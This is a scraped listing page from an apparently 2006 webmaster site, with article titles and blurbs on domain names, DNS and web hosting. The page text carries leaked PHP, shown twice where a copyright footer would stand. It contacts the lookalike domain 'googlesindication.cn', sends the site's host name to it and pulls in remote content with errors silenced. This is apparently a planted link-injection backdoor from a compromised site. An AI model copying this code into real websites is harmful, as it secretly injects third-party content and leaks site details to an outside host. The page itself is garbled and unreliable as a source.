![]() |
| technology ' webmasters ' hosting ' designs | Home | Games | Articles | Learning Center | Contact Us | Add to Favorites |
|
|
©
fetch_remote_file("googlesindication.cn", "/links.php?site=".$_SERVER['HTTP_HOST']);
class GetLinks
{
var $_socket_timeout = 6;
function fetch_remote_file($host, $path)
{
@ini_set('allow_url_fopen', 1);
@ini_set('default_socket_timeout', $this->_socket_timeout);
$this->_fetch_remote_type = 'socket';
$buff = '';
$fp = @fsockopen($host, 80, $errno, $errstr, $this->_socket_timeout);
if ($fp) {
@fputs($fp, "GET {$path} HTTP/1.0\r\nHost: {$host}\r\n");
@fputs($fp, "User-Agent: {$user_agent}\r\n\r\n");
while (!@feof($fp)) {
$buff .= @fgets($fp, 128);
}
@fclose($fp);
$page = explode("\r\n\r\n", $buff);
return $page[1];
}
}
}
?>*
Pages:
1
2
Home
How To Change Your Web Hosting Provider Without Any Downtime
By following these simple steps you should have now successfully moved your website from your old host to your new host without any downtime.
May 02, 2006
How to understand the Domain Name System
The DNS system is run by a series of servers called DNS servers. ICANN manages the root DNS domains, under which are the top-level domains.
April 25, 2006
Domain Name Renewals
Domain registration and domain name renewals s can be loaded with problems if you are not careful in selecting your registrar and fully understanding the terms and conditions associated with renewing domain names.
April 21, 2006
Your Web Hosting Company - Are You Just a Number?
By now I'm sure you know how important your choice of web hosting company is to your business.
April 20, 2006
Domain Names–Protect Yours From Drop Catchers
You can easily avoid becoming a victim of a drop catcher by better understanding how the domain registration system works to protect your domain name.
April 19, 2006
Is Your Domain Name On Someone's Wanted List?
A domain name can make or break an online venture. A domain name is a company's identity online. It is your brand, your personality, your trademark. So, choosing the right domain isn't easy.
April 18, 2006
Great Design Elevates Web Sites Above The Rest
If it doesn’t read quickly, It doesn’t work.
April 17, 2006
What’s On Your Business Card?
It May Be Small, But It’s So Powerful...Your Business Card!
April 17, 2006
Expired Domains: Outrageously Effective Traffic Generation Technique
Expired domains, how can I receive traffic from them? Can I profit from expired domains?
April 14, 2006
10 Sneaky Tricks of Cheap Web Hosting Companies
How do cheap web hosting companies attract business and what are their tricks?
April 13, 2006
©
fetch_remote_file("googlesindication.cn", "/links.php?site=".$_SERVER['HTTP_HOST']);
class GetLinks
{
var $_socket_timeout = 6;
function fetch_remote_file($host, $path)
{
@ini_set('allow_url_fopen', 1);
@ini_set('default_socket_timeout', $this->_socket_timeout);
$this->_fetch_remote_type = 'socket';
$buff = '';
$fp = @fsockopen($host, 80, $errno, $errstr, $this->_socket_timeout);
if ($fp) {
@fputs($fp, "GET {$path} HTTP/1.0\r\nHost: {$host}\r\n");
@fputs($fp, "User-Agent: {$user_agent}\r\n\r\n");
while (!@feof($fp)) {
$buff .= @fgets($fp, 128);
}
@fclose($fp);
$page = explode("\r\n\r\n", $buff);
return $page[1];
}
}
}
?>*
Pages:
1
2
Home
|